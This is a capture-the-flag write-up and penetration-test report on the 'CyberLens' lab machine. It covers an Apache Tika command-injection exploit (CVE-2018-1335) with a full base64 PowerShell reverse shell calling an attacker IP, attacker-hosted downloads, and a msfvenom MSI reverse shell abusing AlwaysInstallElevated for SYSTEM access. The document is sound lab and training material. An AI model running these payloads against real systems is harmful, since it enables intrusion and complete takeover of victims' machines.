CyberLens
export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65417 closed tcp ports (reset), 101 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown
In http://cyberlens.thm/about.html
we find "CyberLens Image Extractor", a metadata extractor. Checking the request with Burpsuit we find the end point at port 61777, which might be resposible for the metadata extraction.
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Going to http://cyberlens.thm:61777
we find "Apache Tika 1.17 Server". From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server (CVE-2018-1335
).
nc -lvnp 6666
git clone https://github.com/canumay/cve-2018-1335
cd cve-2018-1335
python3 exploit.py $TARGET_IP 61777 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMgAuADEANwAuADQANAAiACwANgA2ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
You can also do it manually:
curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMgAuADEANwAuADQANAAiACwANgA2ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');"
Or using Metasploit, whatever.
I used PowerShell #3 (Base64)
from https://www.revshells.com/
.
So we are in.
whoami # cyberlens\cyberlens
Get-MpComputerStatus # Check if any protection, like antivirus or Windows Defender, is up and running.
Neither of the protection mechanisms is enabled or running.
Downlaod PrivescCheck.ps1
(https://github.com/itm4n/PrivescCheck) from the Attacker Machine:
# Inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80
curl http://10.2.17.44:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck
We see that AlwaysInstallElevated
might be enabled. If AlwaysInstallElevated
is enabled on a target, it allows us to exploit it by crafting our own malicious MSI file that gets executed in the context of the local SYSTEM account.
Once created, we can download and execute the malicious file on the victim as ANY user, and it will run under the context of the local SYSTEM account. This means that by placing malicious shell code in an MSI file, we are able to obtain a reverse shell as SYSTEM.
´´´ ???????????????????????????????????????????????????????????????? ? CATEGORY ? TA0004 - Privilege Escalation ? ? NAME ? AlwaysInstallElevated ? ? TYPE ? Base ? ???????????????????????????????????????????????????????????????? ? Check whether the 'AlwaysInstallElevated' policy is enabled ? ? system-wide and for the current user. If so, the current ? ? user may install a Windows Installer package with elevated ? ? (SYSTEM) privileges. ? ????????????????????????????????????????????????????????????????
LocalMachineKey : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer LocalMachineValue : AlwaysInstallElevated LocalMachineData : 1 CurrentUserKey : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer CurrentUserValue : AlwaysInstallElevated CurrentUserData : 1 Description : AlwaysInstallElevated is enabled in both HKLM and HKCU.
[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008 ´´´
We craft a simple Windows reverse shell via msfvenom in the file format of an MSI.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.2.17.44 LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi
nc -lvnp 8888
python3 -m http.server 80
curl http://10.2.17.44:80/rev.msi -o rev.msi
.\rev.msi
whoami # nt authority\system
cd C:\Users\Administrator\Desktop
type admin.txt
This report details the findings of a penetration test conducted against the target system "CyberLens." The assessment revealed a critical vulnerability (CVE-2018-1335) in Apache Tika, a component of the target's web application. This vulnerability allowed for remote code execution (RCE), leading to an initial foothold on the system. Further investigation revealed a privilege escalation vulnerability through the "AlwaysInstallElevated" Windows policy, ultimately granting SYSTEM-level access to the target machine.
Phase 1: Reconnaissance and Enumeration
The target IP address was identified as 10.10.195.124. To facilitate access, the /etc/hosts
file on the attacking machine was modified to map the hostname cyberlens.thm
to the target IP:
export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm
Explanation: The /etc/hosts
file is used for local hostname resolution. This entry allows us to use the user-friendly name cyberlens.thm
instead of the IP address throughout the penetration test.
1.2. Port Scanning
A comprehensive port scan was performed using nmap
to identify open ports and running services:
nmap -p- --min-rate 5000 $TARGET_IP
Results:
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown
Phase 2: Vulnerability Analysis and Exploitation
2.1. Web Application Analysis
Browsing to http://cyberlens.thm
revealed a website with an "About" page (http://cyberlens.thm/about.html
) mentioning "CyberLens Image Extractor," a metadata extraction tool.
Using Burp Suite to intercept the HTTP requests, we observed a PUT
request to /meta
on port 61777 when interacting with the image extractor:
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Explanation: Burp Suite is a web application security testing tool that allows us to intercept, inspect, and modify HTTP traffic. This PUT
request indicates that the metadata extraction functionality likely resides on the unusual port 61777.
2.2. Apache Tika Vulnerability (CVE-2018-1335)
Navigating to http://cyberlens.thm:61777
displayed "Apache Tika 1.17 Server." Research revealed that Apache Tika versions 1.7 to 1.17 are vulnerable to command injection (CVE-2018-1335).
Exploitation:
-
Reverse Shell Setup: A netcat listener was started on the attacking machine to receive the reverse shell connection:
nc -lvnp 6666
-
Exploit Execution: The
cve-2018-1335
exploit from GitHub was used. This exploit leverages the vulnerability to execute arbitrary commands on the target system. The command executes a base64-encoded PowerShell reverse shell (PowerShell #3 (Base64)
from https://www.revshells.com/).git clone https://github.com/canumay/cve-2018-1335
cd cve-2018-1335
python3 exploit.py $TARGET_IP 61777 "powershell -e [BASE64_ENCODED_PAYLOAD]"This establishes a reverse shell, giving the attacker command-line access to the target machine.
-
Manual Exploitation (Alternative): The vulnerability can also be exploited manually using
curl
:curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e [BASE64_ENCODED_PAYLOAD]');"Explanation: This
curl
command sends a crafted HTTP PUT request with specific headers that exploit the Tika vulnerability: *X-Tika-OCRTesseractPath
andX-Tika-OCRLanguage
: These headers are manipulated to inject the command. *Content-type
: This header should be image related, according to the vulnerability specification.This is a manual demonstration of how the exploit works, bypassing the need for the Python script.
-
Reverse Shell Payload Generation (Example): Websites like
https://www.revshells.com/
can be used to generate various reverse shell payloads. ThePowerShell #3 (Base64)
option provides a convenient, encoded payload. It's crucial to use reliable sources and understand the payload you are using.
Phase 3: Privilege Escalation
3.1. Initial Foothold and System Enumeration
After successful exploitation, we gained a reverse shell as the cyberlens\cyberlens
user:
whoami # Output: cyberlens\cyberlens
Initial system checks were performed:
Get-MpComputerStatus # Check Windows Defender status
Explanation: Get-MpComputerStatus
checks the status of Windows Defender. This is important to understand the security posture of the system and anticipate potential obstacles. In this case, it was found to be disabled, simplifying the escalation process.
3.2. Automated Privilege Escalation Checks
The PrivescCheck.ps1
script was used to identify potential privilege escalation vectors. The script checks for a variety of common misconfigurations and vulnerabilities.
# Inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80 # Host a simple HTTP server
curl http://[ATTACKER_IP]:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck # Load and run the script
Explanation:
curl ... -o ...
: Downloads the script from the attacker's web server.. .\PrivescCheck.ps1
: The dot-sourcing operator (.
) executes the script in the current scope, making its functions available.Invoke-PrivescCheck
: This is the main function of the script that performs the checks.
3.3. AlwaysInstallElevated Vulnerability
PrivescCheck.ps1
identified the AlwaysInstallElevated
policy as being enabled:
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0004 - Privilege Escalation ?
? NAME ? AlwaysInstallElevated ?
? TYPE ? Base ?
????????????????????????????????????????????????????????????????
? Check whether the 'AlwaysInstallElevated' policy is enabled ?
? system-wide and for the current user. If so, the current ?
? user may install a Windows Installer package with elevated ?
? (SYSTEM) privileges. ?
????????????????????????????????????????????????????????????????
LocalMachineKey : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData : 1
CurrentUserKey : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
CurrentUserValue : AlwaysInstallElevated
CurrentUserData : 1
Description : AlwaysInstallElevated is enabled in both HKLM and HKCU.
[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008
Explanation: AlwaysInstallElevated
is a Windows policy that, when enabled, allows any user to install MSI (Microsoft Installer) packages with SYSTEM-level privileges. This is a significant security risk because it bypasses normal user access controls. The registry keys HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
control this policy.
3.4. MSI-Based Privilege Escalation
-
Crafting a Malicious MSI:
msfvenom
was used to create an MSI package containing a reverse shell payload:msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi
Explanation:
-p windows/x64/shell_reverse_tcp
: Specifies a 64-bit Windows reverse shell payload.LHOST=[ATTACKER_IP]
: Sets the attacker's IP address for the reverse shell connection.LPORT=8888
: Sets the port for the reverse shell connection.-a x64
: Specifies the architecture (64-bit).--platform Windows
: Specifies the target operating system.-f msi
: Specifies the output format as an MSI package.-o rev.msi
: Sets the output file name.
-
Hosting the MSI: The attacker's machine hosted the malicious MSI file:
python3 -m http.server 80
-
Downloading and Executing the MSI: The MSI was downloaded and executed on the target machine:
Target Machinecurl http://[ATTACKER_IP]:80/rev.msi -o rev.msi
.\rev.msi -
Receiving the SYSTEM Shell: A netcat listener was set up on the attacker's machine to receive the elevated reverse shell:
nc -lvnp 8888
-
Verification: Once the connection was established, the
whoami
command confirmed SYSTEM-level access:Listening port 8888whoami # Output: nt authority\system
-
Accessing Sensitive Data: With SYSTEM privileges, the administrator's files could be accessed:
cd C:\Users\Administrator\Desktop
type admin.txt
Recommendations
- Patch Apache Tika: Immediately update Apache Tika to a version that is not vulnerable to CVE-2018-1335 (version 1.18 or later).
- Disable AlwaysInstallElevated: Disable the "AlwaysInstallElevated" policy in both the HKLM and HKCU registry hives. This is a critical security best practice.
- Enable Windows Defender: Ensure that Windows Defender (or a suitable alternative antivirus/endpoint protection solution) is enabled and up-to-date.